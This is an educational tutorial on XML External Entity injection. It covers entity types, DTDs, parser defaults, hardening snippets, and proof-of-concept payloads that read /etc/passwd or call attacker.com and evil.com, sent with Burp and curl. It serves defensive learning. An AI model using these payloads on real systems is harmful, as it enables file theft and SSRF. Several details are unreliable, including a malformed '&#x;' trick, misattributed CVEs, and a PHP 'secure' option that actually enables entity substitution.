XXE Injection Fundamentals: Entities,...

Introduction

XML External Entity (XXE) injection is a class of injection attacks that arise when an XML parser processes user-supplied XML containing a reference to an external resource. By abusing the parser’s entity resolution mechanism, an attacker can read arbitrary files, trigger SSRF, or even achieve remote code execution on vulnerable back-ends.

Why is it important? Despite the rise of JSON, many legacy systems, SOAP services, configuration files, and even modern micro-services still rely on XML. Mis-configured parsers are a frequent entry point for data-exfiltration and pivoting within a target network.

Real-world relevance: Vulnerabilities in widely-deployed libraries such as libxml2, Java’s DocumentBuilderFactory, and .NET’s XmlDocument have led to high-severity CVEs (e.g., CVE-2020-1938, CVE-2022-22965). Successful XXE exploits have been observed in banking APIs, healthcare platforms, and SaaS products.

Prerequisites

Basic understanding of XML syntax and structure (elements, attributes, namespaces).
Familiarity with HTTP request/response cycles, including headers and bodies.
Knowledge of common web-application architectures (REST, SOAP, monolith vs. micro-service).

Core Concepts

At the heart of XXE lies the XML entity - a reusable piece of data that can be defined inside a Document Type Definition (DTD). When a parser encounters an entity reference, it replaces the reference with the entity’s value. If the entity points to an external resource, the parser will fetch that resource unless explicitly told not to.

Two broad categories of entities exist:

Internal entities: Defined with a literal string value. Example: <!ENTITY hello "Hello, world!">.
External entities: Defined with a system identifier (URL, file path, or other URI). Example: <!ENTITY xxe SYSTEM "file:///etc/passwd">.

When a parser resolves an external entity, it may:

Read a local file (file://).
Make an HTTP request (http://) enabling Server-Side Request Forgery (SSRF).
Trigger a DNS lookup (dns://) that can be used for out-of-band data exfiltration.

Understanding how a particular parser treats DTDs and entities is crucial for both offensive testing and defensive hardening.

Definition and types of XML entities (internal vs external)

Entities are declared inside a DTD, either inline (<!DOCTYPE root […]>) or via an external DTD file referenced with SYSTEM or PUBLIC. The syntax is:

<!ENTITY name "replacement text"> <!-- internal -->
<!ENTITY name SYSTEM "uri"> <!-- external -->
<!ENTITY name PUBLIC "publicId" "uri"> <!-- public external -->

Internal entities are harmless in the context of injection; they simply substitute static text. External entities are the attack vector because the parser performs I/O when expanding them.

Example of a malicious external entity that reads /etc/passwd:

<!ENTITY xxe SYSTEM "file:///etc/passwd">
<root> <data>&xxe;</data>
</root>

When processed, the &xxe; reference is replaced with the contents of /etc/passwd, which the application may return to the attacker.

Document Type Definition (DTD) purpose and syntax

A DTD defines the legal building blocks of an XML document: element types, attribute lists, entity declarations, and notation declarations. It can be embedded directly in the document or stored externally.

Embedded DTD example:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE note [ <!ENTITY writer "John Doe"> <!ENTITY xxe SYSTEM "http://attacker.com/collect?data=&#x;">
]>
<note> <to>Alice</to> <from>&writer;</from> <body>&xxe;</body>
</note>

External DTD reference (useful for hiding the malicious entity in a separate file):

<!DOCTYPE root SYSTEM "http://evil.com/malicious.dtd">
<root>&xxe;</root>

Many parsers will fetch the external DTD before processing the document body, providing a convenient injection point.

How XML parsers resolve external entities

When a parser encounters a DOCTYPE declaration, it typically follows these steps:

Parse the DTD (inline or external) to build an entity table.
For each entity reference encountered in the XML document, look up the table.
If the entity is external, open the URI using the parser’s underlying I/O subsystem (file system, network socket, etc.).
Replace the reference with the retrieved content and continue parsing.

Implementation details differ:

libxml2 (used by PHP, Python lxml, Ruby Nokogiri) resolves external entities by default unless XML_PARSE_NOENT or XML_PARSE_DTDLOAD flags are cleared.
Java’s Xerces enables external DTD loading unless the system property SOME_PROPERTY is set to true or XMLConstants.FEATURE_SECURE_PROCESSING is enabled.
.NET XmlDocument loads external DTDs unless XmlResolver is set to null or XmlReaderSettings.DtdProcessing = DtdProcessing.Prohibit.

Because the resolution occurs before the document tree is fully built, an attacker can cause side-effects (file reads, outbound HTTP) even if the application never directly accesses the entity value later.

Common vulnerable parsers (e.g., libxml2, Java XML parsers, .NET XmlDocument)

Below is a concise matrix of popular parsing libraries and their default entity handling:

Language / Library	Default DTD Loading	External Entity Resolution	Secure Default (2024)
PHP - `simplexml_load_string` (libxml2)	Enabled	Enabled	Set `LIBXML_NOENT` off, use `LIBXML_DTDLOAD` false
Python - `lxml.etree.fromstring`	Enabled	Enabled	Pass `resolve_entities=False`
Java - `DocumentBuilderFactory`	Enabled	Enabled	Set `factory.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true)`
.NET - `XmlDocument`	Enabled	Enabled	Assign `xmlResolver = null` or `settings.DtdProcessing = DtdProcessing.Prohibit`
Go - `encoding/xml`	Disabled (no DTD support)	N/A	Safe by design

Notice that the majority of high-risk languages keep DTD loading on by default, making them frequent targets for XXE.

Configuring parsers to enable/disable external entity processing

Below are code snippets for turning off external entity resolution in the most common stacks.

PHP (libxml2)

$xml = "<?xml version='1.0'?><!DOCTYPE root [ <!ENTITY xxe SYSTEM 'file:///etc/passwd'> ]><root>&xxe;</root>";

$libxmlOptions = LIBXML_NOENT | LIBXML_DTDLOAD; // insecure
// Secure configuration - disable entity expansion and DTD loading
$secureOptions = LIBXML_NOENT; // keep NOENT off, DTDLOAD off by default
$doc = simplexml_load_string($xml, 'SimpleXMLElement', $secureOptions);

Python (lxml)

from lxml import etree
xml = """<!DOCTYPE root [ <!ENTITY xxe SYSTEM 'file:///etc/passwd'> ]><root>&xxe;</root>"""

# Insecure - default resolves entities
parser = etree.XMLParser(resolve_entities=True, load_dtd=True)
# Secure - turn both off
secure_parser = etree.XMLParser(resolve_entities=False, load_dtd=False)

# Insecure parsing (will raise if vulnerable)
# etree.fromstring(xml, parser)

# Secure parsing
root = etree.fromstring(xml, secure_parser)
print(etree.tostring(root))

Java (Xerces)

import javax.xml.parsers.*;
import org.w3c.dom.*;
import java.io.*;

public class SafeXML { public static void main(String[] args) throws Exception { String xml = "<!DOCTYPE root [ <!ENTITY xxe SYSTEM 'file:///etc/passwd'> ]><root>&xxe;</root>"; DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance(); // Disable DTDs entirely dbf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true); // Optional hardening dbf.setFeature("http://xml.org/sax/features/external-general-entities", false); dbf.setFeature("http://xml.org/sax/features/external-parameter-entities", false); DocumentBuilder db = dbf.newDocumentBuilder(); Document doc = db.parse(new ByteArrayInputStream(xml.getBytes())); System.out.println(doc.getDocumentElement().getTextContent()); }
}

.NET (C#)

using System;
using System.Xml;

class SafeXml { static void Main() { string xml = "<!DOCTYPE root [ <!ENTITY xxe SYSTEM 'file:///c:/windows/win.ini'> ]><root>&xxe;</root>"; XmlReaderSettings settings = new XmlReaderSettings(); settings.DtdProcessing = DtdProcessing.Prohibit; // disables external DTDs settings.XmlResolver = null; // further hardening using (XmlReader reader = XmlReader.Create(new System.IO.StringReader(xml), settings)) { XmlDocument doc = new XmlDocument(); doc.Load(reader); Console.WriteLine(doc.InnerText); } }
}

Notice the pattern: explicitly disable DTD loading, prohibit external entities, and set the resolver to null or equivalent.

Crafting a minimal XXE payload for proof-of-concept testing

A reliable PoC payload should be as small as possible to avoid being filtered by WAFs or input validation. The classic “file read” payload works against any parser that loads DTDs:

<!DOCTYPE data [ <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<data>&xxe;</data>

If the target is a Windows host, replace the URI with file:///c:/windows/win.ini. For SSRF testing, point the entity to an attacker-controlled HTTP server:

<!DOCTYPE data [ <!ENTITY xxe SYSTEM "ATTACKER_URL">
]>
<data>&xxe;</data>

The &#x; trick forces the parser to URL-encode the resolved content, which can be captured by the attacker’s server logs.

Testing with Burp Suite/OWASP ZAP and simple curl commands

Once you have a payload, you need a way to inject it into the target endpoint. Below are two common approaches.

Burp Suite - Intruder

Capture a legitimate request containing an XML body (e.g., POST /api/upload).
Send the request to Intruder, place the payload in the body position.
Choose “Pitchfork” or “Cluster Bomb” if you need to test multiple payload variations.

POST /api/upload HTTP/1.1
Host: vulnerable.app
Content-Type: application/xml
Content-Length: 123

<!DOCTYPE data [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<data>&xxe;</data>

Observe the response - if the body contains root:x:0:0: you have a successful read.

OWASP ZAP - Fuzzer

Similar to Burp, add a custom payload file to the fuzzer and target the XML parameter. ZAP will auto-decode the response for you.

curl - quick command-line test

curl -X POST TARGET_URL -H "Content-Type: application/xml" --data-binary $'<!DOCTYPE data [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]> <data>&xxe;</data>'

When testing against a remote server, you may need to escape newlines or use a file:

cat > payload.xml <<EOF
<!DOCTYPE data [ <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<data>&xxe;</data>
EOF
curl -X POST TARGET_URL -H "Content-Type: application/xml" --data-binary @payload.xml

If the response body contains the passwd file content, the target is vulnerable.

Defense & Mitigation

Mitigation is a layered approach:

Parser hardening: Disable DTD processing, external entities, and set secure defaults. See the code examples above.
Input validation: Reject any request containing a <!DOCTYPE declaration unless absolutely required.
Network segmentation: Prevent the application server from accessing sensitive internal files or making outbound HTTP requests to untrusted hosts.
Library updates: Many CVEs are patched by updating libxml2, Xerces, or .NET runtime. Keep dependencies current.
Security testing: Include XXE tests in your CI pipeline using tools like xsser, Burp Suite Scanner, or custom scripts.

For services that legitimately need DTDs (e.g., legacy SOAP), consider using a sandboxed parser instance that runs in a separate container with read-only filesystem and no network access.

Common Mistakes

Turning off only XML_PARSE_NOENT but leaving XML_PARSE_DTDLOAD enabled - the parser will still fetch external DTDs.
Assuming “XML is safe because JSON is safe” - many developers forget about XML after migrating to REST.
Relying on client-side validation - attacker can craft raw HTTP requests.
Using resolve_entities=True in Python without realizing it enables external entity resolution.
Not sanitizing error messages - the parser may return the resolved entity in an error response, leaking data.

Always verify the effective parser configuration with a simple test payload before declaring a system “secure”.

Real-World Impact

XXE attacks have been leveraged to:

Steal database credentials from configuration files (config.yml, .env).
Perform internal port scans via SSRF to services that are otherwise firewalled.
Exfiltrate large data sets by chaining multiple entity references (entity expansion attacks, a.k.a. “billion laughs”).
Trigger deserialization exploits by loading malicious XML that contains crafted objects (e.g., Java java.beans.XMLDecoder).

In 2022, a major SaaS provider disclosed a breach where an attacker used XXE to read private customer metadata, leading to GDPR fines. The root cause was a mis-configured DocumentBuilderFactory that allowed external DTDs.

Expert opinion: As organizations adopt API-first architectures, the surface area for XML parsing is expanding (e.g., SAML, SOAP, configuration management). Attackers will continue to search for “forgotten” XML endpoints. Prioritizing parser hardening early in the SDLC reduces risk dramatically.

Practice Exercises

Simple file read: Deploy a tiny Flask app that parses XML with lxml. Send the minimal payload and capture the response. Then harden the parser and verify the attack fails.
SSRF via external entity: Set up a local HTTP server (e.g., python -m http.server 8000) and craft a payload pointing to ATTACKER_URL. Observe the server logs.
Bypass validation: Create a form that strips the string <!DOCTYPE using a regex. Attempt to bypass it with whitespace or comments (<! DOCTYPE, ). Document the results.
Automated scanner integration: Add an OWASP ZAP script that injects the payload into every XML parameter of a target application. Review the alerts generated.

Document your findings in a short report - this mimics a real penetration test deliverable.

Summary

XXE remains a potent attack vector because XML parsers by default trust external entities. Understanding the distinction between internal and external entities, how DTDs are processed, and the default behavior of popular parsers equips security professionals to both find and remediate these flaws. By disabling DTD loading, prohibiting external entities, and validating input, you can effectively neutralize XXE risks. Regular testing with minimal payloads, automated scanners, and continuous hardening are essential to keep modern applications safe.

XXE Injection Fundamentals: Entities, DTDs, and Parser Behaviors